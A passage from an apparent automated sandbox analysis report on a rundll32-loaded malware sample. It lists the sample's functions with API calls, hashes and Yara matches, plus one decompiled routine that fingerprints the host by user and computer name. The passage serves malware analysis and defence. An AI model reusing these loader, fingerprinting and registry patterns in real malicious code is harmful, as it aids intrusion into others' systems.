                            • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                            • String ID:
                            • API String ID: 3915436794-0
                            • Opcode ID: 6e652fe648e61f1ad44e59c80205bc952fc8dc3c48d7da89f77c14dbc699de9c
                            • Instruction ID: 90b103da7d7ea6aa27efb99f0d932755d6ceca5dc7e2187d4b0c3a47732ed865
                            • Opcode Fuzzy Hash: 6e652fe648e61f1ad44e59c80205bc952fc8dc3c48d7da89f77c14dbc699de9c
                            • Instruction Fuzzy Hash: 7F31B131D012069FDB21EF28E84892BB7E5FB84325B02455EF8568B255D738FC12CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F686AD Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,04F6E23D,00000000,7620F5B0,04F70348,?,00000001), ref: 04F686CD
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F686E2
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F686FE
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F68713
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F68727
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$AddressProc
                            • String ID:
                            • API String ID: 1469910268-0
                            • Opcode ID: 00092f1dae7691b2dcf454759e037088d2a8b23fc0374c21486381339c2a1170
                            • Instruction ID: c6f7cb0bcbf3e24d45db463f80787c8d101ff5a1b11cfc16b5e191f8205f176c
                            • Opcode Fuzzy Hash: 00092f1dae7691b2dcf454759e037088d2a8b23fc0374c21486381339c2a1170
                            • Instruction Fuzzy Hash: 933138B6A40A1A9FCB01DF68F881E7573E9EB09710B40805EE605DF200D7B8EC028F54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F78327 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04F7833B
                            • GetComputerNameW.KERNEL32(00000000,?), ref: 04F78357
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • GetUserNameW.ADVAPI32(761F81D0,761B5520), ref: 04F78391
                            • GetComputerNameW.KERNEL32(?,?), ref: 04F783B4
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,761F81D0,?,00000000,?,00000000,00000000), ref: 04F783D7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: 5cec289e6c36a56dae174fc78ddc880eea24411c617fb17019df9ebf27b94efc
                            • Instruction ID: 561b21221916b7859d573f6195250e29251f4f091fd21419cef768655a562c5b
                            • Opcode Fuzzy Hash: 5cec289e6c36a56dae174fc78ddc880eea24411c617fb17019df9ebf27b94efc
                            • Instruction Fuzzy Hash: 3A21C5B6900209FFDB11DFA8D988CEEBBBCEB44344B5044AAE501EB240E634AB45DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A12A11 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A12A11() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x746bc742
						_v12 = _v12 + _t11;
						_t64 = E04A16D63(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04A16C2C(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4a157e9
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                            0x04a12a1f
                            0x04a12a22
                            0x04a12a25
                            0x04a12a2b
                            0x04a12a30
                            0x04a12a36
                            0x04a12a3e
                            0x04a12a41
                            0x04a12a47
                            0x04a12a4c
                            0x04a12a55
                            0x04a12a59
                            0x04a12a66
                            0x04a12a6a
                            0x04a12a6c
                            0x04a12a70
                            0x04a12a73
                            0x04a12a83
                            0x04a12ad6
                            0x04a12ad7
                            0x04a12a85
                            0x04a12a8a
                            0x04a12a8b
                            0x04a12a90
                            0x04a12a93
                            0x04a12aa6
                            0x00000000
                            0x04a12aa8
                            0x04a12aab
                            0x04a12ab0
                            0x04a12abe
                            0x04a12ac1
                            0x04a12ac7
                            0x04a12acc
                            0x00000000
                            0x04a12ace
                            0x04a12ace
                            0x04a12ad1
                            0x04a12ad1
                            0x04a12acc
                            0x04a12aa6
                            0x04a12adc
                            0x04a12add
                            0x04a12a4c
                            0x04a12ae3

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,04A157E7), ref: 04A12A25
                            • GetComputerNameW.KERNEL32(00000000,04A157E7), ref: 04A12A41
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • GetUserNameW.ADVAPI32(00000000,04A157E7), ref: 04A12A7B
                            • GetComputerNameW.KERNEL32(04A157E7,746BC740), ref: 04A12A9E
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04A157E7,00000000,04A157E9,00000000,00000000,?,746BC740,04A157E7), ref: 04A12AC1
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: 48302456abe6555ea3a73acc33d6bc6ce4daabfc0bccc2d25cda78232e5655c3
                            • Instruction ID: bbf7bf7800c8f18c160a543f348ace32d61530e7574e51d06fed4d8fc23b19d7
                            • Opcode Fuzzy Hash: 48302456abe6555ea3a73acc33d6bc6ce4daabfc0bccc2d25cda78232e5655c3
                            • Instruction Fuzzy Hash: AF21D4B6900208FFDB21DFE9D9849AEBBBCFF54340B5044AAE501E7250E634AB45DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6306D Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • DeleteFileA.KERNEL32(00000000,000004D2), ref: 04F63090
                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04F63099
                            • GetLastError.KERNEL32 ref: 04F630A3
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F63162
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                            • String ID:
                            • API String ID: 3543646443-0
                            • Opcode ID: 9bcea378b08ab5c09cb2cd5bb52f7d3875694143a9cfb68461d3a1841f7295c4
                            • Instruction ID: 0bb9f44756df82af35f7328e093608414f9ac7cade2931299ef4f73b21271dfb
                            • Opcode Fuzzy Hash: 9bcea378b08ab5c09cb2cd5bb52f7d3875694143a9cfb68461d3a1841f7295c4
                            • Instruction Fuzzy Hash: E5215172A01614BFD611ABA4FC48E96379CDF4A254B04405BBB05DF241DA2CF9058BF9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F72F4E Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F71C19: GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04F6E231,00000000,7620F5B0,04F70348,?,00000001), ref: 04F71C25
                              • Part of subcall function 04F71C19: _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04F71C3B
                              • Part of subcall function 04F71C19: _snwprintf.NTDLL ref: 04F71C60
                              • Part of subcall function 04F71C19: CreateFileMappingW.KERNEL32(000000FF,04F8A1E8,00000004,00000000,00001000,?), ref: 04F71C7C
                              • Part of subcall function 04F71C19: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04F71C8E
                              • Part of subcall function 04F71C19: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04F71CC6
                            • UnmapViewOfFile.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04F6E231,00000000,7620F5B0,04F70348,?,00000001), ref: 04F72F89
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F72F92
                            • SetEvent.KERNEL32(?,00000001,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04F6E231,00000000,7620F5B0,04F70348,?,00000001), ref: 04F72FD9
                            • GetLastError.KERNEL32(04F73959,00000000,00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F73008
                            • CloseHandle.KERNEL32(00000000,04F73959,00000000,00000000,?,?,?,?,?,?,?,04F69100,?), ref: 04F73018
                              • Part of subcall function 04F6C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,04F6171E,?,?,00000000,?), ref: 04F6C2B6
                              • Part of subcall function 04F6C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,04F6171E,?,?,00000000,?), ref: 04F6C2DE
                              • Part of subcall function 04F6C2AA: memset.NTDLL ref: 04F6C2F0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                            • String ID:
                            • API String ID: 1106445334-0
                            • Opcode ID: f839248005ab063e0d401a6c6cfb8ef3b8c8d81bd0978ddd28642699abf42e26
                            • Instruction ID: 162995a92ed5d019494e9b6ef313b52fee839b700d4fa399795eb9cf1928b829
                            • Opcode Fuzzy Hash: f839248005ab063e0d401a6c6cfb8ef3b8c8d81bd0978ddd28642699abf42e26
                            • Instruction Fuzzy Hash: 38216231A00309ABEB11AFB4FC44A6A77A9EF00314B05046EE941D7150EB3DFD43DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7A651 Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,761B6920,00000000,?,?,?,04F6148A,?,?,?), ref: 04F7A66F
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,04F6148A,?,?,?), ref: 04F7A67F
                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,04F6148A,?,?,?), ref: 04F7A6AB
                            • GetLastError.KERNEL32(?,?,04F6148A,?,?,?), ref: 04F7A6D0
                            • CloseHandle.KERNEL32(000000FF,?,?,04F6148A,?,?,?), ref: 04F7A6E1
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateErrorHandleLastReadSize
                            • String ID:
                            • API String ID: 3577853679-0
                            • Opcode ID: 2d0c5efab39e9ccc50fc85eff7b9f404bdd64c11e92b8a2c26b4a40035a12382
                            • Instruction ID: 0115dca18ce84ba01b19e45cb79dfee170c7ee0379ba23eaa3070360131e9aab
                            • Opcode Fuzzy Hash: 2d0c5efab39e9ccc50fc85eff7b9f404bdd64c11e92b8a2c26b4a40035a12382
                            • Instruction Fuzzy Hash: 62112C72D00219BFDB205F64DCC8EBE7B5CEB04394F12053AF826AB180E678AD429790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F675D8 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                            Download Yara Rule
                            APIs
                            • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?,00000000,00000001,00000000,?), ref: 04F675E9
                            • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?,00000000,00000001,00000000,?), ref: 04F67602
                            • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 04F6762A
                            • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 04F67639
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,04F787C2,?,?,?), ref: 04F67670
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Trim$FreeHeap
                            • String ID:
                            • API String ID: 2132463267-0
                            • Opcode ID: ab10c5ca31777d5bb33e09da055a5bea60fb948f54b44afd8677fe31734e50e9
                            • Instruction ID: 796f31717d491a432f47a48b8bf45f2d42898cb7482c007842e2b6f6c46209ca
                            • Opcode Fuzzy Hash: ab10c5ca31777d5bb33e09da055a5bea60fb948f54b44afd8677fe31734e50e9
                            • Instruction Fuzzy Hash: 6B11867260020ABBD711AA5DEC85FAB7BECDB44794F104025BA06DB241EB75EC029B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7389D Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,0138D5A8,?,?,00000000,00000000,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C), ref: 04F738D4
                            • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F73904
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F73913
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F73931
                            • GetLastError.KERNEL32(?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F73941
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                            • String ID:
                            • API String ID: 653387826-0
                            • Opcode ID: cdef089551fcf93922f8ff26247f1dacdf80bcda4b22ccbd889bbdc3204d2992
                            • Instruction ID: 1c71f5d7f68f272bad2de673a087b4141048fca3e52afc8952732398d5259817
                            • Opcode Fuzzy Hash: cdef089551fcf93922f8ff26247f1dacdf80bcda4b22ccbd889bbdc3204d2992
                            • Instruction Fuzzy Hash: DD2128B5A00B06FFD710CFA8D984A5ABBF8FF08314700852AEA5697B40D774F944DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F77408 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 04F77436
                            • GetLastError.KERNEL32 ref: 04F77459
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04F7746C
                            • GetLastError.KERNEL32 ref: 04F77477
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F774BF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                            • String ID:
                            • API String ID: 1671499436-0
                            • Opcode ID: a92a940c6a1d139c3e0f4bcaf66a4f79472505ac7e28c924b5c265ea6c2033fe
                            • Instruction ID: 9fac0fc76ff24112778ce20d68e22bc1c56000ad0792debc7567d2ba12a93364
                            • Opcode Fuzzy Hash: a92a940c6a1d139c3e0f4bcaf66a4f79472505ac7e28c924b5c265ea6c2033fe
                            • Instruction Fuzzy Hash: CC219F71950248FBEB21AF50ED88F6E7FF9EB00318F60041AE1429A0A0D37DBD85AB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F73775 Relevance: 7.6, APIs: 5, Instructions: 67memoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedIncrement.KERNEL32(04F8A06C), ref: 04F73785
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 04F737DC
                            • InterlockedDecrement.KERNEL32(04F8A06C), ref: 04F737F1
                            • DeleteFileA.KERNEL32(00000000), ref: 04F7380F
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7381D
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                              • Part of subcall function 04F6A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F6A391
                              • Part of subcall function 04F6A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04F6A3BD
                              • Part of subcall function 04F6A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 04F6A3CD
                              • Part of subcall function 04F6A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 04F6A405
                              • Part of subcall function 04F6A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 04F6A427
                              • Part of subcall function 04F6A316: GetShellWindow.USER32 ref: 04F6A436
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                            • String ID:
                            • API String ID: 1587453479-0
                            • Opcode ID: 8b6a9818c48ecfa4063ea635542bc4851688c295a62f6538c04d98a449359ff6
                            • Instruction ID: 9b706f732825490731a4b409f299b7e346a496dca1d8214c02dfd03301416608
                            • Opcode Fuzzy Hash: 8b6a9818c48ecfa4063ea635542bc4851688c295a62f6538c04d98a449359ff6
                            • Instruction Fuzzy Hash: 48116375900209BFEB115FA4DC84EAE3F7DEB44355F10402AFA059E100D779A946EB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F626D3 Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F626E7
                            • memcpy.NTDLL(00000000,?,?,?), ref: 04F62710
                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 04F62739
                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 04F62759
                            • RegCloseKey.ADVAPI32(?), ref: 04F62764
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value$AllocateCloseCreateHeapmemcpy
                            • String ID:
                            • API String ID: 2954810647-0
                            • Opcode ID: 155c4c1f25c1e38e54c42ad443501044767b8b03d9ef38cac81efc3ba7d9c7a7
                            • Instruction ID: a5be697ac0b0a2b6ead2f7ef0b93dd08dc5146c857c3614db4a4d4427387d9b4
                            • Opcode Fuzzy Hash: 155c4c1f25c1e38e54c42ad443501044767b8b03d9ef38cac81efc3ba7d9c7a7
                            • Instruction Fuzzy Hash: AC11C27260010DBFEF126E64FC88EBE776DFB44355F010026FE02A61A0E675AD21D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6E57D Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(04F6980C,?,?,?,?,00000008,04F6980C,00000000,?), ref: 04F6E59A
                            • memcpy.NTDLL(04F6980C,?,00000009,?,?,?,?,00000008,04F6980C,00000000,?), ref: 04F6E5BC
                            • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 04F6E5D4
                            • lstrlenW.KERNEL32(00000000,00000001,04F6980C,?,?,?,?,?,?,?,00000008,04F6980C,00000000,?), ref: 04F6E5F4
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,04F6980C,00000000,?), ref: 04F6E619
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                            • String ID:
                            • API String ID: 3065863707-0
                            • Opcode ID: 948d638d493d213f7117334756d93330b4294177cdae6f6c57be48eea0d35d52
                            • Instruction ID: 54f785bf4082b4679a5179fb68c5b4a2b3cc55e0876924e03e9483b24dc0a498
                            • Opcode Fuzzy Hash: 948d638d493d213f7117334756d93330b4294177cdae6f6c57be48eea0d35d52
                            • Instruction Fuzzy Hash: 4111667AE0120CBBDB119FA4EC08FDE7F79EB08714F004055FA19EA280D674DA49DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7FE94 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcmpi.KERNEL32(00000000,?), ref: 04F7FEC3
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F7FED0
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F7FEE3
                            • lstrcmpi.KERNEL32(04F8A440,00000000), ref: 04F7FF03
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F6404D,00000000), ref: 04F7FF17
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                            • String ID:
                            • API String ID: 1266740956-0
                            • Opcode ID: 7ae6155d7df0fc36969fb7547915e3d8da6b6eaef11d89a8b66bcd8742bb5aeb
                            • Instruction ID: dcff343121023774ebe56d663e71346138370b2553aea4e23177474438eaa937
                            • Opcode Fuzzy Hash: 7ae6155d7df0fc36969fb7547915e3d8da6b6eaef11d89a8b66bcd8742bb5aeb
                            • Instruction Fuzzy Hash: 44115E32D05209EFDB14DF58E849AAAB7E8FF45328B14415FE409DB651D73CED028BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F63263 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000000,04F83716,00000000,04F72466,?,?,?,04F78A07,?,?,?,00000000,00000001,00000000,?), ref: 04F6326D
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F63291
                            • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,04F78A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 04F63298
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F632E0
                            • lstrcat.KERNEL32(00000000,?), ref: 04F632EF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                            • String ID:
                            • API String ID: 2616531654-0
                            • Opcode ID: c6c480d18d360ac71c717e596567387a32d7578aef69ac9846290006d8480535
                            • Instruction ID: cb02967180b36cca6a2c361f1d80499e53db73232e493e9d2ee9dfd188489859
                            • Opcode Fuzzy Hash: c6c480d18d360ac71c717e596567387a32d7578aef69ac9846290006d8480535
                            • Instruction Fuzzy Hash: 0F1173B660060BABD7219E65AC89E7B77ECEB85200F05452DFA06DB104EB29E8468761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7E3CD Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,04F6243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7D58C
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04F7E3F6
